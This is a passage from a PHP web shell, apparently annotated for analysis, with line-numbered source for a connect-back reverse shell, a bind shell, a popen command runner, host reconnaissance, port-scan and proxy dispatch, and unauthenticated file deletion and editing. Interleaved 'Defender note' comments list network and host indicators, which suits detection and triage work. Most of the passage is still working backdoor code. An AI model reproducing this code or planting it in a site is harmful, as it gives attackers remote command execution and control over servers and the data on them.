 * loop forever reading up to 1024 bytes per turn and handing them to
 * linux_exec(). The loop has no exit, so the function never returns
 * normally and the socket is never closed here; a closed peer makes
 * socket_read() return false/"" and an empty command is then run.
 *
 * @param string $host
 * @param int|string $port
 * @return int -1 when the connect or the banner write fails
 *
 * Defender note: the banner "connect back from phpshell\n" is sent in
 * clear text as the first bytes of the connection, which makes it a usable
 * network IoC; on the host, the web server worker keeps one long-lived
 * outbound connection open while repeatedly spawning shells.
 */
903 | function connect_backdoor($host, $port)
904 | {
905 | $banner = "connect back from phpshell\n";
906 |
907 | $socket = tcp_connect($host, $port);
908 | if ($socket == -1) {
909 | echo "connect to $host:$port failed.\n";
910 | return -1;
911 | }
912 | echo "connect to $host:$port ok.\n";
913 |
914 | $ret = socket_write($socket, $banner, strlen($banner));
915 | if ($ret == false) {
916 | echo "write data failed.\n";
917 | socket_close($socket);
918 | return -1;
919 | }
920 |
// Command loop; never terminates.
921 | while (true) {
922 | $buf = socket_read($socket, 1024);
923 | echo $buf;
924 | linux_exec($socket, $buf);
925 | }
926 | }
927 |
/**
 * Bind shell: listen on $local_port (bind address '0', presumably the
 * wildcard - confirm), accept a single client, send a fixed banner, then
 * loop forever feeding 1024-byte reads to linux_exec(). The while(true)
 * command loop has no exit, so the socket_close() calls and return 0 after
 * it are unreachable.
 *
 * @param int|string $local_port
 * @return int -1 on socket creation, bind, listen or banner-write failure
 *
 * Defender note: a new listening port owned by the web server process is
 * the host-side artefact; the banner "bindshell from phpshell\n" is the
 * first payload on any accepted connection.
 */
928 | function bindshell($local_port)
929 | {
930 | $banner = "bindshell from phpshell\n";
931 |
932 | $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
933 | if ($socket == false) {
934 | echo "create socket error.\n";
935 | return -1;
936 | }
937 |
938 | if (socket_bind($socket, '0', $local_port) == false) {
939 | echo "bind sock error.\n";
940 | socket_close($socket);
941 | return -1;
942 | }
943 |
944 | if (socket_listen($socket) == false) {
945 | echo "listen sock error.\n";
946 | socket_close($socket);
947 | return -1;
948 | }
949 | echo "listen on port $local_port ok.\n";
950 |
// Blocks in socket_accept() until the first client connects.
951 | while (true) {
952 | if (($newsock = socket_accept($socket)) !== false) {
953 | socket_getpeername($newsock, $ip);
954 | echo "got a client form $ip"."
";
955 | break;
956 | }
957 | }
958 |
959 | $ret = socket_write($newsock, $banner, strlen($banner));
960 | if ($ret == false) {
961 | echo "write data failed.\n";
962 | socket_close($newsock);
963 | socket_close($socket);
964 | return -1;
965 | }
966 |
// Command loop; never terminates, so the cleanup below is dead code.
967 | while (true) {
968 | $buf = socket_read($newsock, 1024);
969 | echo $buf;
970 | linux_exec($newsock, $buf);
971 | }
972 |
973 | socket_close($newsock);
974 | socket_close($socket);
975 | return 0;
976 | }
977 |
/**
 * Form handler for the "backdoor" page: prints the form (markup stripped
 * in this copy), then starts connect_backdoor() when target_host and
 * target_port are truthy, and bindshell() when bind_port is truthy.
 *
 * All three fields are read from $_POST without isset() (notices when
 * absent). Since connect_backdoor() never returns, the bindshell branch is
 * only reached when the target fields are empty.
 *
 * @return void
 */
978 | function run_backdoor()
979 | {
980 | echo '
1004 | Linux connect backdoor
1005 |
1012 |
1013 | Linux bindshell backdoor
1014 |
1019 | ';
1020 |
1021 | if ($_POST['target_host'] && $_POST['target_port']) {
1022 | connect_backdoor($_POST['target_host'], $_POST['target_port']);
1023 | }
1024 | if ($_POST['bind_port']) {
1025 | bindshell($_POST['bind_port']);
1026 | }
1027 | }
1028 |
1029 | /*
1030 | function exec_shell($cmd)
1031 | {
1032 | $handle = popen($cmd, "r");
1033 |
1034 | while (($buf = fgets($handle, 1024)) != false) {
1035 | echo $buf;
1036 | }
1037 |
1038 | pclose($handle);
1039 | return 0;
1040 | }
1041 |
1042 | function run_shell()
1043 | {
1044 | $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
1045 | $uid = posix_getuid();
1046 | $user_info = posix_getpwuid($uid);
1047 |
1048 | echo '
1049 |
1050 |
1064 |
1065 |
1066 | ';
1077 | }
1078 | }
1079 | */
1080 |
/**
 * Run $cmd through popen() (system shell) and return everything it wrote
 * to stdout as one string.
 *
 * NOTE(review): $data is never initialised, so a command with no output
 * returns null (with a notice) rather than ""; popen() failure is not
 * checked. The `."".` concatenation is a no-op.
 *
 * @param string $cmd command line
 * @return string|null captured stdout
 *
 * Defender note: as with linux_exec(), the process tree shows the web
 * server worker as the parent of "sh -c".
 */
1081 | function run_terminal_shell($cmd)
1082 | {
1083 | $handle = popen($cmd, "r");
1084 |
1085 | while (($buf = fgets($handle, 1024)) != false) {
1086 | $data .= $buf."";
1087 | }
1088 |
1089 | pclose($handle);
1090 | return $data;
1091 | }
1092 |
/**
 * "shell" page: build a "user@host:cwd" prompt from posix_getpwuid(),
 * gethostbyaddr($_SERVER['SERVER_NAME']) and getcwd(), then print the page
 * (markup stripped in this copy; the original lines 1104-1158 that would
 * have wired the prompt to run_terminal_shell() are not present here).
 *
 * gethostbyaddr() expects an IP address; with a hostname in SERVER_NAME it
 * returns the input unchanged or false.
 *
 * @return void
 */
1093 | function aio_shell()
1094 | {
1095 | $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
1096 | $uid = posix_getuid();
1097 | $user_info = posix_getpwuid($uid);
1098 | $curr_path = getcwd();
1099 | $prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
1100 |
1101 | echo '
1102 |
1103 |
1123 |
1129 |
1130 |
1131 |
1159 |
1160 | ';
1161 |
1162 | }
1163 |
/**
 * Alternative dispatcher on $_GET['cmd'] (backdoor / shell / portscan /
 * proxy) with a menu fallback (markup stripped in this copy).
 *
 * Nothing in the visible listing calls this function: the file's entry
 * point at the bottom invokes aio_main(), which handles the same commands
 * plus "dir", "delete" and "edit". Presumably an earlier revision's entry
 * point - confirm before assuming it is dead.
 *
 * @return void
 */
1164 | function webshell_main()
1165 | {
1166 | if (isset($_GET['cmd'])) {
1167 | if ($_GET['cmd'] == "backdoor") {
1168 | run_backdoor();
1169 | }
1170 | if ($_GET['cmd'] == "shell") {
1171 | aio_shell();
1172 | }
1173 | if ($_GET['cmd'] == "portscan") {
1174 | run_portscan();
1175 | }
1176 | if ($_GET['cmd'] == "proxy") {
1177 | web_proxy_client();
1178 | }
1179 | }
1180 | else {
1181 | echo '
1182 |
1183 |
1184 |
1185 | show directorys |
1186 | connect backdoor |
1187 | port scan |
1188 | reverse proxy |
1189 | cmd shell |
1190 |
1191 |
1192 | ';
1193 | }
1194 | }
1195 |
/**
 * Page entry point (called unconditionally at the bottom of the file).
 *
 * Collects a host banner - uid/gid/home/shell, uname, server name:port,
 * local time, server software, PHP and Zend versions, disable_functions,
 * safe_mode, cwd, and total/free space of "/" in whole GB - prints it
 * (markup stripped in this copy), then dispatches on $_GET['cmd'] (dir /
 * backdoor / shell / portscan / proxy) and on $_GET['delete'] and
 * $_GET['edit'], which are passed as raw paths to delete_file() and
 * edit_file() (both defined above the part of the file shown here).
 *
 * NOTE(review): $safemode is set to "On" precisely when ini_get() returned
 * false, i.e. when safe_mode is off or the directive no longer exists
 * (removed in PHP 5.4), so the label is inverted. $_GET['cmd'],
 * ['delete'] and ['edit'] are read without isset().
 *
 * Defender note: there is no authentication anywhere in the visible file -
 * any client that can reach the URL gets every function. For triage, the
 * query strings `?cmd=`, `?delete=` and `?edit=` against this file, and the
 * banner-collection calls (posix_uname, disk_total_space, get_cfg_var) in
 * php-fpm/httpd audit logs, are the access-log and host-side indicators.
 *
 * @return void
 */
1196 | function aio_main()
1197 | {
1198 | $uid = posix_getuid();
1199 | $user_info = posix_getpwuid($uid);
1200 |
1201 | $uid_banner="uid=".$uid."(".$user_info['name'].") ".
1202 | "gid=".$user_info['gid']."(".$user_info['name'].") ".
1203 | "dir=".$user_info['dir']." ".
1204 | "shell=".$user_info['shell'];
1205 |
1206 | $uname = posix_uname();
1207 |
1208 | $uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
1209 | $uname['version']." ".$uname['machine'];
1210 |
1211 | $server_addr=$_SERVER['SERVER_NAME'];
1212 | $server_port= $_SERVER['SERVER_PORT'];
1213 |
1214 | $server_time=date("Y/m/d h:i:s",time());
1215 | $phpsoft=$_SERVER['SERVER_SOFTWARE'];
1216 | $php_version=PHP_VERSION;
1217 | $zend_version=zend_version();
1218 | $dis_func=get_cfg_var("disable_functions");
// See NOTE above: this shows "On" when safe_mode is absent or off.
1219 | $safemode=@ini_get('safe_mode');
1220 | if ($safemode == false)
1221 | $safemode="On";
1222 | $cwd_path=getcwd();
1223 | $total_disk=disk_total_space("/");
1224 | $total_disk_gb=intval($total_disk/(1024*1024*1024));
1225 | $free_disk=disk_free_space("/");
1226 | $free_disk_gb=intval($free_disk/(1024*1024*1024));
1227 | echo '
1228 |
1229 |
1310 |
1311 |
1312 |
1313 | PHP AIO SHELL
1314 |
1315 |
1316 |
1317 | User: '.$uid_banner.' |
1318 | '.$server_time.' |
1319 |
1320 |
1321 | Uname: '.$uname_banner.' |
1322 | '.$server_addr.":".$server_port.' |
1323 |
1324 |
1325 |
1326 |
1327 | Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
1328 | | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
1329 |
1330 |
1331 |
1332 |
1333 | Directroy: '.$cwd_path.' |
1334 | Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB |
1335 |
1336 |
1337 |
1338 |
1339 |
1348 |
1349 |
1350 |
1351 | ';
1352 |
// Command dispatch; each branch is a separate `if`, but the values are
// mutually exclusive so at most one runs.
1353 | if ($_GET['cmd']) {
1354 | if ($_GET['cmd'] == "dir") {
1355 | aio_directory();
1356 | }
1357 | if ($_GET['cmd'] == "backdoor") {
1358 | run_backdoor();
1359 | }
1360 | if ($_GET['cmd'] == "shell") {
1361 | aio_shell();
1362 | }
1363 | if ($_GET['cmd'] == "portscan") {
1364 | run_portscan();
1365 | }
1366 | if ($_GET['cmd'] == "proxy") {
1367 | web_proxy_client();
1368 | }
1369 | }
1370 |
// File operations on caller-supplied paths, no normalisation or allow-list.
1371 | if ($_GET['delete']) {
1372 | delete_file($_GET['delete']);
1373 | }
1374 | if ($_GET['edit']) {
1375 | edit_file($_GET['edit']);
1376 | }
1377 | }
1378 |
// Entry point: every request to this file runs aio_main() immediately,
// with no authentication gate in front of it.
1379 | aio_main();
1380 | ?>
1381 |
--------------------------------------------------------------------------------